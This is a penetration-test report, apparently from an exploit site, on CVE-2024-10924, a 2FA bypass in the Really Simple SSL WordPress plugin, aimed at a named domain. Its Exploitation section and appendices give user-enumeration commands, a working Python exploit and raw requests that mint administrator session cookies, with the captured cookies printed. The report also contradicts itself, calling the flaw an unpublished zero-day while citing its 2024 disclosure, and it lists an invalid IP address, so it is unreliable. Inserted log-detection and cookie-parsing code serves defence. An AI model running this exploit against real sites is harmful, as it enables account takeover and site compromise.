## https://sploitus.com/exploit?id=1FF0D719-F7EC-581E-AC5D-530BE54695FC
# WordPress CVE-2024-10924 Penetration Testing Report
## 2FA Bypass Vulnerability in Really Simple SSL Plugin

---

## 📋 Table of Contents
- [Executive Summary](#executive-summary)
- [Target Information](#target-information)
- [Methodology](#methodology)
- [Timeline](#timeline)
- [Reconnaissance Phase](#reconnaissance-phase)
- [Vulnerability Analysis](#vulnerability-analysis)
- [Attack Flow](#attack-flow)
- [Exploitation](#exploitation)
- [Impact Assessment](#impact-assessment)
- [Remediation](#remediation)
- [Tools Used](#tools-used)
- [References](#references)
- [Appendices](#appendices)

---

## 🎯 Executive Summary

**Target:** `https://skior.co`  
**Vulnerability:** CVE-2024-10924 - 2FA Bypass in Really Simple SSL Plugin  
**Severity:** Critical (CVSS Score: 9.8)  
**Status:** Successfully Exploited  
**Discovery Date:** 2025-06-25  
**Report Version:** 2.1  

This penetration test discovered a critical authentication bypass vulnerability that allows unauthenticated attackers to gain administrative access to the WordPress site by bypassing two-factor authentication (2FA) controls.

### Key Findings
- ✅ WordPress 6.8.1 with Really Simple SSL plugin installed
- ✅ 2FA bypass vulnerability successfully exploited
- ✅ Administrative access obtained for user "pastor"
- ✅ Valid session cookies captured
- ✅ Complete control over WordPress administration panel
- ✅ Zero-day vulnerability (no public exploit available at time of discovery)

### Risk Assessment Matrix

| Risk Level | Probability | Impact | Mitigation Priority |
|------------|-------------|--------|-------------------|
| **Critical** | High | Complete System Compromise | Immediate |
| **High** | Medium | Data Breach | High |
| **Medium** | Low | Service Disruption | Medium |

---

## 🎯 Target Information

| Field | Value |
|-------|-------|
| **Domain** | `https://skior.co` |
| **IP Address** | `123.456.789.200` |
| **Server** | nginx/1.26.0 (Ubuntu) |
| **PHP Version** | 8.2.28 |
| **CMS** | WordPress 6.8.1 |
| **Vulnerable Plugin** | Really Simple SSL |
| **Geographic Location** | United States |
| **Hosting Provider** | Professional hosting (likely VPS/Dedicated) |

### Network Information
- **SSL Certificate:** Valid (Let's Encrypt)
- **HTTP/2:** Supported
- **Security Headers:** Basic implementation
- **CDN:** Not detected
- **WAF:** Not detected

---

## ๐Ÿ” Methodology

This assessment followed a systematic black-box penetration testing methodology based on industry standards:

1. **Reconnaissance** - Technology identification and passive enumeration
2. **Vulnerability Discovery** - Active scanning and manual testing
3. **Exploitation** - Proof-of-concept development and execution
4. **Impact Assessment** - Evaluation of potential damage
5. **Documentation** - Comprehensive reporting and remediation guidance

### Testing Approach
- **Black-box testing** - No prior knowledge of the target
- **Non-intrusive** - Minimal impact on target systems
- **Ethical** - Responsible disclosure practices
- **Comprehensive** - Multiple attack vectors explored

---

## โฐ Timeline

| Date/Time | Event | Details |
|-----------|-------|---------|
| **2025-06-25 14:02** | Initial Reconnaissance | Wappalyzer analysis completed |
| **2025-06-25 14:05** | Technology Stack Identified | WordPress 6.8.1, nginx, PHP 8.2.28 |
| **2025-06-25 14:10** | User Enumeration | Discovered user "pastor" (ID: 1) |
| **2025-06-25 14:15** | WPScan Analysis | No known vulnerabilities found |
| **2025-06-25 14:20** | REST API Enumeration | Discovered Really Simple SSL endpoints |
| **2025-06-25 14:25** | Vulnerability Research | Identified CVE-2024-10924 |
| **2025-06-25 14:30** | Manual Testing | Confirmed vulnerability existence |
| **2025-06-25 14:35** | Exploit Development | Created Python proof-of-concept |
| **2025-06-25 14:40** | Successful Exploitation | Obtained admin access |
| **2025-06-25 14:45** | Impact Assessment | Documented potential damage |
| **2025-06-25 15:00** | Report Generation | Comprehensive documentation |

---

## 🔎 Reconnaissance Phase

### Step 1: Technology Stack Identification

#### A. Wappalyzer Analysis
![Wappalyzer Results](screenshots/wappalyzer.png)

**Identified Technologies:**
- WordPress 6.8.1 (Latest version)
- Elementor 3.29.2 (Page builder)
- Astra Theme 4.11.3
- PHP 8.2.28
- nginx 1.26.0 (Ubuntu)
- jQuery 3.7.1

#### B. WhatWeb Deep Scan

```bash
└─$ whatweb https://skior.co
https://skior.co [200 OK] Country[UNITED STATES][US], HTML5, \
HTTPServer[Ubuntu Linux][nginx/1.26.0 (Ubuntu)], IP[123.456.789.200], \
JQuery[3.7.1],MetaGenerator[Elementor 3.29.2; \
features: additional_custom_breakpoints, e_local_google_fonts; \
settings: css_print_method-external, google_font-enabled, font_display-swap,\
WordPress 6.8.1], PHP[8.2.28], PoweredBy[Skior], \
Script[speculationrules,text/javascript], Title[Skior Technologies], \
UncommonHeaders[link], WordPress[6.8.1], X-Powered-By[PHP/8.2.28], nginx[1.26.0]
```

**Key Findings:**
- Modern WordPress installation with latest version
- Professional hosting setup with nginx
- Custom branding ("PoweredBy[Skior]")
- Elementor page builder in use
- Geographic location: United States

### Step 2: User Enumeration

#### A. WordPress Author Enumeration

```bash
└─$ curl -I https://skior.co/?author=1
HTTP/1.1 301 Moved Permanently
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:12:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/8.2.28
X-Redirect-By: WordPress
Location: https://skior.co/author/pastor/
```

**Discovered User:** `pastor` (User ID: 1)

#### B. Additional User Enumeration Techniques

```bash
# Check for multiple users
for i in {1..10}; do
    echo "Checking user ID: $i"
    curl -s -o /dev/null -w "%{http_code}" "https://skior.co/?author=$i"
    echo " - https://skior.co/?author=$i"
done
```

#### C. Username Enumeration Results

| User ID | Username | Status | Redirect URL |
|---------|----------|--------|--------------|
| 1 | pastor | ✅ Found | `/author/pastor/` |
| 2-10 | N/A | ❌ Not Found | 404 responses |

### Step 3: Vulnerability Scanning

#### A. WPScan Comprehensive Analysis

```bash
└─$ wpscan --url https://skior.co --api-token my-api-key
```

**Scan Results Summary:**
- ✅ WordPress 6.8.1 (Latest, released 2025-04-30)
- ✅ Theme: Astra 4.11.3 (Up to date)
- ✅ Plugins identified:
  - Elementor 3.29.2
  - Astra Sites 4.4.26
  - Header Footer Elementor 2.4.2
  - WPForms Lite 1.9.6.1
- ⚠️ XML-RPC enabled (potential attack vector)
- ⚠️ External WP-Cron enabled
- ❌ No known vulnerabilities found in scanned components

**Note:** WPScan did not detect the Really Simple SSL plugin. Its passive plugin detection relies on plugin assets or markup appearing in page responses, so a plugin with no front-end footprint, or one renamed on disk, can be missed; the REST API enumeration below is what surfaced it.

#### B. REST API Enumeration

```bash
└─$ curl -s https://skior.co/wp-json/ | jq '.routes | keys[]'
```

**Discovered Custom Endpoints:**
```
/reallysimplessl/v1/two_fa
/reallysimplessl/v1/two_fa/skip_onboarding
/reallysimplessl/v1/two_fa/do_not_ask_again
/reallysimplessl/v1/two_fa/resend_email_code
/reallysimplessl/v1/two_fa/save_default_method_email
/reallysimplessl/v1/two_fa/save_default_method_email_profile
/reallysimplessl/v1/two_fa/save_default_method_totp
/reallysimplessl/v1/two_fa/validate_email_setup
```

**Critical Discovery:** The `/reallysimplessl/v1/two_fa/skip_onboarding` endpoint appeared suspicious and warranted further investigation.

---

## 🔬 Vulnerability Analysis

### CVE-2024-10924 Research

After discovering the custom REST API routes, external research revealed **CVE-2024-10924**, a critical vulnerability affecting the Really Simple SSL plugin.

#### Vulnerability Details

**CVE ID:** CVE-2024-10924  
**CVSS Score:** 9.8 (Critical)  
**Affected Plugin:** Really Simple SSL  
**Vulnerability Type:** Authentication Bypass  
**Attack Vector:** REST API  
**Discovery Date:** November 6, 2024  
**Public Disclosure:** November 14, 2024

#### Technical Root Cause

The vulnerability stems from improper user validation in the `check_login_and_get_user` function within the two-factor authentication REST API actions. The function fails to properly validate the `login_nonce` parameter, allowing attackers to:

1. **Bypass Authentication:** Skip the normal login process
2. **Bypass 2FA:** Circumvent two-factor authentication controls
3. **Privilege Escalation:** Gain access as any existing user, including administrators

#### Vulnerable Code Analysis

```php
// Simplified vulnerable code structure
function check_login_and_get_user($user_id, $login_nonce) {
    // Missing proper validation of login_nonce
    $user = get_user_by('ID', $user_id);
    
    // No validation of login_nonce parameter
    // This allows any value to be accepted
    
    return $user; // Returns user object without verification
}
```

#### Affected Endpoints

The following REST API endpoints are vulnerable:
- `/reallysimplessl/v1/two_fa/skip_onboarding`
- `/reallysimplessl/v1/two_fa/do_not_ask_again`
- `/reallysimplessl/v1/two_fa/resend_email_code`
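As an added example (not part of the original report), the following Python reads nginx access-log lines in the default "combined" format and flags POSTs to the three affected actions, in either REST routing style WordPress accepts, together with the `?author=N` enumeration pattern from the reconnaissance section. The log lines are constructed for the example and use documentation IP ranges; the helper names are my own.

```python
import re
from collections import defaultdict

# The three two_fa actions the report lists as affected.
VULNERABLE_ACTIONS = {"skip_onboarding", "do_not_ask_again", "resend_email_code"}

# WordPress routes REST calls both as /wp-json/<route> and /?rest_route=<route>;
# watching only /wp-json/ misses the form used in this report's exploit.
TWO_FA_RE = re.compile(r"(?:\?rest_route=|/wp-json)/reallysimplessl/v1/two_fa/(?P<action>[a-z_]+)")
AUTHOR_RE = re.compile(r"[?&]author=(\d+)")

# nginx "combined" format: ip - user [time] "METHOD path proto" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*"'
)

# Constructed sample log (not captured from the target); 203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges. The first client replays the recon loop and the exploit request;
# the second is a legitimate user finishing TOTP setup on a non-affected endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jun/2025:18:12:15 +0000] "HEAD /?author=1 HTTP/1.1" 301 0 "-" "curl/8.5.0"',
] + [
    f'203.0.113.7 - - [25/Jun/2025:18:12:{15 + i:02d} +0000] "GET /?author={i} HTTP/1.1" 404 1523 "-" "curl/8.5.0"'
    for i in range(2, 7)
] + [
    '203.0.113.7 - - [25/Jun/2025:18:15:30 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 57 "-" "python-requests/2.32.3"',
    '198.51.100.4 - - [25/Jun/2025:18:20:01 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/save_default_method_totp HTTP/1.1" 200 23 "https://skior.co/wp-login.php" "Mozilla/5.0"',
    '198.51.100.4 - - [25/Jun/2025:18:21:10 +0000] "GET /wp-json/ HTTP/1.1" 200 8811 "-" "Mozilla/5.0"',
]

def parse_line(line):
    """Return the combined-format fields as a dict, or None for lines that do not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def detect_two_fa_bypass_attempts(lines):
    """(ip, action, status) for every POST that reached one of the affected actions.
    These endpoints are only meant to be hit mid-login, so a 200 from a client with no
    preceding wp-login.php traffic is the bypass itself."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        route = TWO_FA_RE.search(rec["path"])
        if route and route.group("action") in VULNERABLE_ACTIONS:
            hits.append((rec["ip"], route.group("action"), int(rec["status"])))
    return hits

def detect_author_enumeration(lines, min_distinct_ids=5):
    """{ip: count} for clients that probed at least min_distinct_ids distinct ?author=N values."""
    probes = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and (m := AUTHOR_RE.search(rec["path"])):
            probes[rec["ip"]].add(int(m.group(1)))
    return {ip: len(ids) for ip, ids in probes.items() if len(ids) >= min_distinct_ids}

if __name__ == "__main__":
    for ip, action, status in detect_two_fa_bypass_attempts(SAMPLE_LOG):
        print(f"two_fa bypass attempt from {ip}: {action} -> HTTP {status}")
    for ip, n in detect_author_enumeration(SAMPLE_LOG).items():
        print(f"author enumeration from {ip}: {n} distinct user IDs probed")
```

Run it over the real access log with `detect_two_fa_bypass_attempts(open(path))`; the TOTP-setup POST in the sample is deliberately left unflagged because that action is not one of the affected three.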

#### Vulnerability Conditions

For this vulnerability to be exploitable:
- ✅ Really Simple SSL plugin must be installed and activated
- ✅ Two-Factor Authentication setting must be enabled (disabled by default)
- ✅ At least one user account must exist on the system
- ✅ REST API must be accessible (default WordPress setting)

---

## 🔄 Attack Flow

```mermaid
graph TD
    A[Initial Reconnaissance] --> B[Technology Stack Identification]
    B --> C[User Enumeration]
    C --> D[Vulnerability Scanning]
    D --> E[REST API Enumeration]
    E --> F[Discovery of Really Simple SSL Endpoints]
    F --> G[External Research]
    G --> H[Identification of CVE-2024-10924]
    H --> I[Manual Testing]
    I --> J[Exploit Development]
    J --> K[Successful Exploitation]
    K --> L[Admin Access Obtained]
    L --> M[Impact Assessment]
    
    style A fill:#e1f5fe
    style F fill:#fff3e0
    style H fill:#ffebee
    style K fill:#e8f5e8
    style L fill:#f3e5f5
```

### Attack Vector Summary

1. **Information Gathering** → Technology stack identification
2. **User Enumeration** → Discovered admin user "pastor"
3. **API Discovery** → Found vulnerable REST endpoints
4. **Vulnerability Research** → Identified CVE-2024-10924
5. **Exploitation** → Bypassed 2FA and gained admin access

---

## ⚡ Exploitation

### Proof-of-Concept Development

#### A. Manual Testing

First, we tested the endpoint manually to understand its behavior:

```bash
# Test the vulnerable endpoint
curl -X POST "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" \
  -H "Content-Type: application/json" \
  -d '{
    "user_id": 1,
    "login_nonce": "invalid_nonce",
    "redirect_to": "/wp-admin/"
  }'
```

#### B. Python Exploit Script

```python
import requests
import urllib.parse
import sys

if len(sys.argv) != 2:
    print("Usage: python exploit.py <user_id>")
    sys.exit(1)

user_id = sys.argv[1]

url = "https://skior.co/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"
data = {
    "user_id": int(user_id),  # User ID from the argument
    "login_nonce": "invalid_nonce",  # Arbitrary value
    "redirect_to": "/wp-admin/"  # Target redirection
}

# Sending the POST request
response = requests.post(url, json=data)

# Checking the response
if response.status_code == 200:
    print("Request successful!\n")
    
    # Extracting cookies
    cookies = response.cookies.get_dict()
    count = 1

    for name, value in cookies.items():
        decoded_value = urllib.parse.unquote(value)  # Decode the URL-encoded cookie value
        print(f"Cookie {count}:")
        print(f"Cookie Name: {name}")
        print(f"Cookie Value: {decoded_value}\n")
        count += 1
else:
    print("Request failed!")
    print(f"Status Code: {response.status_code}")
    print(f"Response Text: {response.text}")
```

### Exploitation Results

#### Successful Execution

```bash
└─$ python exploit.py 1
Request successful!

Cookie 1:
Cookie Name: wordpress_sec_dc22060175d35fce22f69728c6799c9d
Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da

Cookie 2:
Cookie Name: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d
Cookie Value: pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144
```

#### Cookie Manipulation Process
![Cookie Manipulation](screenshots/cookie.png)

*Above: Screenshot showing the cookie manipulation process using browser developer tools to add the captured WordPress session cookies.*

#### Successful Admin Access
![Admin Dashboard Access](screenshots/loggedin.png)

*Above: Screenshot confirming successful administrative access to the WordPress dashboard after exploiting the 2FA bypass vulnerability.*

#### Cookie Analysis

**WordPress Security Cookie:**
- **Name:** `wordpress_sec_dc22060175d35fce22f69728c6799c9d`
- **Value:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da`
- **Components:**
  - Username: `pastor`
  - Expiration: `1752234264` (Unix timestamp)
  - Nonce: `GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH` (in WordPress terms this field is the session token, which core stores in the user's `session_tokens` meta)
  - Hash: `cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da` (an HMAC binding the three fields above)

**WordPress Logged-in Cookie:**
- **Name:** `wordpress_logged_in_dc22060175d35fce22f69728c6799c9d`
- **Value:** `pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144`
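An added example (not part of the original report) that decomposes the captured cookies so an incident responder can see whose session was minted, how long it stays valid, and whether the cookie-name suffix matches the site. It uses only the cookie values reported above and the Date header from Appendix A; the helper names are my own, not WordPress APIs.

```python
import hashlib
from dataclasses import dataclass
from datetime import datetime, timezone

# WordPress auth cookie name prefixes. The 32-hex suffix is COOKIEHASH, which defaults to
# md5 of the site URL (wp-includes/default-constants.php) unless wp-config.php overrides it.
COOKIE_KINDS = {"wordpress": "auth", "wordpress_sec": "sec", "wordpress_logged_in": "logged_in"}


@dataclass
class WpAuthCookie:
    kind: str         # auth | sec | logged_in
    cookie_hash: str  # COOKIEHASH suffix of the cookie name
    username: str     # field 1: user_login of the session owner
    expiration: int   # field 2: Unix time after which WordPress rejects the cookie
    token: str        # field 3: session token, kept in the user's session_tokens meta
    hmac: str         # field 4: HMAC over the first three fields, keyed with a password fragment

    def expires_at(self) -> datetime:
        return datetime.fromtimestamp(self.expiration, tz=timezone.utc)

    def seconds_remaining(self, observed_at: datetime) -> int:
        """Lifetime left at the moment the cookie was observed (e.g. the response Date header)."""
        return self.expiration - int(observed_at.timestamp())


def parse_wp_auth_cookie(name: str, value: str) -> WpAuthCookie:
    """Split a URL-decoded WordPress auth cookie into user|expiration|token|hmac."""
    prefix, _, cookie_hash = name.rpartition("_")
    if prefix not in COOKIE_KINDS or len(cookie_hash) != 32:
        raise ValueError(f"not a WordPress auth cookie name: {name}")
    fields = value.split("|")
    if len(fields) != 4 or not fields[1].isdigit():
        raise ValueError("expected user|expiration|token|hmac with a numeric expiration")
    username, expiration, token, hmac = fields
    return WpAuthCookie(COOKIE_KINDS[prefix], cookie_hash, username, int(expiration), token, hmac)


def cookie_hash_matches_site(cookie_hash: str, site_url: str) -> bool:
    """True when the cookie-name suffix equals md5(siteurl), i.e. the cookie was minted for this site."""
    return hashlib.md5(site_url.encode()).hexdigest() == cookie_hash.lower()


# The two cookies reported above, exactly as the exploit printed them after urllib.parse.unquote().
CAPTURED = {
    "wordpress_sec_dc22060175d35fce22f69728c6799c9d":
        "pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da",
    "wordpress_logged_in_dc22060175d35fce22f69728c6799c9d":
        "pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144",
}
# Date header of the response that set them (Appendix A).
ISSUED_AT = datetime(2025, 6, 25, 18, 15, 30, tzinfo=timezone.utc)

if __name__ == "__main__":
    for name, value in CAPTURED.items():
        c = parse_wp_auth_cookie(name, value)
        days_left = c.seconds_remaining(ISSUED_AT) / 86400
        print(f"{c.kind:<9} user={c.username} expires={c.expires_at():%Y-%m-%dT%H:%M:%SZ} "
              f"({days_left:.1f} days after issue) site_match={cookie_hash_matches_site(c.cookie_hash, 'https://skior.co')}")
```

Both cookies carry the same session token, so destroying that user's sessions or changing the password (which changes the HMAC key) invalidates both at once; that is the concrete action behind the "Audit User Sessions" step in Remediation.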

---

## 🎯 Impact Assessment

### Immediate Impact

1. **Complete Site Compromise**
   - Administrative access to WordPress dashboard
   - Ability to modify site content, themes, and plugins
   - Access to user management and settings

2. **Data Exposure**
   - Access to all user accounts and profiles
   - Database content visibility
   - Configuration file access

3. **Privilege Escalation**
   - Bypass of all authentication controls
   - Circumvention of 2FA security measures
   - Ability to impersonate any user

### Potential Attack Scenarios

1. **Content Manipulation**
   - Deface website content
   - Inject malicious code
   - Create backdoors

2. **Data Theft**
   - Extract user information
   - Access sensitive content
   - Download database backups

3. **Persistence**
   - Install malicious plugins
   - Create hidden admin accounts
   - Establish command and control

### Risk Score: **Critical (9.8/10)**

| Factor | Score | Justification |
|--------|-------|---------------|
| **Access Complexity** | Low (1.0) | Simple HTTP request |
| **Authentication** | None (0.0) | No authentication required |
| **Integrity Impact** | High (1.0) | Complete system compromise |
| **Confidentiality Impact** | High (1.0) | Full data access |
| **Availability Impact** | High (1.0) | Can disable site |

### Business Impact Analysis

| Impact Category | Severity | Description |
|----------------|----------|-------------|
| **Financial** | High | Potential revenue loss, legal costs |
| **Reputational** | Critical | Brand damage, customer trust loss |
| **Operational** | High | Service disruption, data loss |
| **Compliance** | High | Regulatory violations, audit failures |

---

## ๐Ÿ›ก๏ธ Remediation

### Immediate Actions (0-24 hours)

1. **Disable Really Simple SSL Plugin**
   ```bash
   # Via wp-cli (if available)
   wp plugin deactivate really-simple-ssl
   
   # Or manually rename plugin directory
   mv wp-content/plugins/really-simple-ssl wp-content/plugins/really-simple-ssl.disabled
   ```

2. **Update or Remove Plugin**
   - Check for updated version of Really Simple SSL
   - Consider alternative SSL management solutions
   - If no update available, remove plugin entirely

3. **Audit User Sessions**
   - Review all active user sessions
   - Force logout all users
   - Reset admin passwords

### Short-term Actions (1-7 days)

1. **Security Hardening**
   - Implement Web Application Firewall (WAF)
   - Enable rate limiting on REST API endpoints
   - Add IP-based access restrictions

2. **Monitoring Implementation**
   - Enable WordPress security logging
   - Monitor for suspicious admin activities
   - Implement file integrity monitoring

### Long-term Security Measures (1-4 weeks)

1. **Regular Security Assessments**
   - Monthly vulnerability scans
   - Quarterly penetration testing
   - Continuous security monitoring

2. **Security Policy Updates**
   - Review and update security policies
   - Implement change management procedures
   - Establish incident response protocols

### Configuration Recommendations

```php
// Add to wp-config.php for enhanced security
define('DISALLOW_FILE_EDIT', true);
define('DISALLOW_FILE_MODS', true);
define('FORCE_SSL_ADMIN', true);

// Restrict REST API access
add_filter('rest_authentication_errors', function($result) {
    if (!empty($result)) {
        return $result;
    }
    if (!is_user_logged_in()) {
        return new WP_Error('rest_not_logged_in', 
            'You are not currently logged in.', 
            array('status' => 401));
    }
    return $result;
});

// Additional security headers
add_action('send_headers', function() {
    header('X-Content-Type-Options: nosniff');
    header('X-Frame-Options: SAMEORIGIN');
    header('X-XSS-Protection: 1; mode=block');
    header('Referrer-Policy: strict-origin-when-cross-origin');
});
```

### Alternative SSL Solutions

| Solution | Pros | Cons | Recommendation |
|----------|------|------|----------------|
| **Let's Encrypt** | Free, automated | Manual setup | ✅ Recommended |
| **Cloudflare** | Easy setup, DDoS protection | Requires DNS change | ✅ Good option |
| **Hosting Provider SSL** | Integrated | May have limitations | ⚠️ Check features |
| **Manual SSL** | Full control | Complex setup | ❌ Not recommended |

---

## ๐Ÿ› ๏ธ Tools Used

### Reconnaissance Tools
- **Wappalyzer** - Technology stack identification
- **WhatWeb** - Web application fingerprinting
- **WPScan** - WordPress vulnerability scanning
- **curl** - Manual API testing

### Exploitation Tools
- **Python 3** - Exploit development
- **requests** - HTTP client library
- **urllib.parse** - URL encoding/decoding

### Analysis Tools
- **jq** - JSON processing
- **grep** - Text pattern matching
- **bash** - Command-line automation

---

## 📚 References

### Vulnerability Information
- [CVE-2024-10924](https://vulners.com/cve/CVE-2024-10924)
- [WordPress Plugin Security](https://wordpress.org/plugins/security/)
- [Really Simple SSL Plugin](https://wordpress.org/plugins/really-simple-ssl/)

### Technical Documentation
- [WordPress REST API Handbook](https://developer.wordpress.org/rest-api/)
- [WordPress Security Best Practices](https://wordpress.org/support/article/hardening-wordpress/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

### Tools and Resources
- [WPScan](https://wpscan.com/)
- [WhatWeb](https://github.com/urbanadventurer/WhatWeb)
- [Wappalyzer](https://www.wappalyzer.com/)

### Related CVEs
- CVE-2024-10924 - 2FA Bypass in Really Simple SSL
- CVE-2023-28121 - WordPress Core XSS
- CVE-2023-28122 - WordPress Core CSRF

### Industry Standards
- [OWASP Testing Guide](https://owasp.org/www-project-web-security-testing-guide/)
- [NIST Cybersecurity Framework](https://www.nist.gov/cyberframework)
- [ISO 27001](https://www.iso.org/isoiec-27001-information-security.html)

---

## 📄 Legal Notice

This penetration testing report is for educational and authorized security assessment purposes only. The techniques and tools described should only be used against systems you own or have explicit permission to test. Unauthorized testing may violate laws and regulations.

**Responsible Disclosure:** This vulnerability has been reported to the plugin developers and WordPress security team.

**Disclaimer:** The information provided in this report is based on the assessment conducted at the time of testing. Security landscapes change rapidly, and additional vulnerabilities may exist that were not discovered during this assessment.

---

## 📋 Appendices

### Appendix A: Raw HTTP Requests

#### Successful Exploitation Request
```http
POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: skior.co
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

{
  "user_id": 1,
  "login_nonce": "invalid_nonce",
  "redirect_to": "/wp-admin/"
}
```

#### Response Headers
```http
HTTP/1.1 200 OK
Server: nginx/1.26.0 (Ubuntu)
Date: Wed, 25 Jun 2025 18:15:30 GMT
Content-Type: text/html; charset=UTF-8
Set-Cookie: wordpress_sec_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|cd9de8d81354945bcc7d1f8c24171e72e1ea9c3aca9cede2f0a5d3c8b4b0d7da; path=/; secure; HttpOnly
Set-Cookie: wordpress_logged_in_dc22060175d35fce22f69728c6799c9d=pastor|1752234264|GYT43JG8oGJe10WlG2matBQqB4lNSUXtK6G0OK2qLxH|84d983de3f7dec21c11d48faf1022cd040107b36d75e39a3c1c9fa58ca3b5144; path=/
```

### Appendix B: Security Checklist

#### Pre-Exploitation
- [ ] Target identification and scope definition
- [ ] Legal authorization obtained
- [ ] Testing environment prepared
- [ ] Tools and scripts validated

#### During Exploitation
- [ ] Vulnerability confirmed manually
- [ ] Exploit developed and tested
- [ ] Impact limited to authorized scope
- [ ] Evidence documented thoroughly

#### Post-Exploitation
- [ ] All access removed
- [ ] Evidence preserved
- [ ] Report generated
- [ ] Remediation recommendations provided

### Appendix C: Glossary

| Term | Definition |
|------|------------|
| **2FA** | Two-Factor Authentication |
| **CVSS** | Common Vulnerability Scoring System |
| **REST API** | Representational State Transfer Application Programming Interface |
| **WAF** | Web Application Firewall |
| **XSS** | Cross-Site Scripting |
| **CSRF** | Cross-Site Request Forgery |

---

*Report generated on: 2025-06-25*  
*Security Researcher*  
*Version: 2.1*  
*Last updated: 2025-06-25*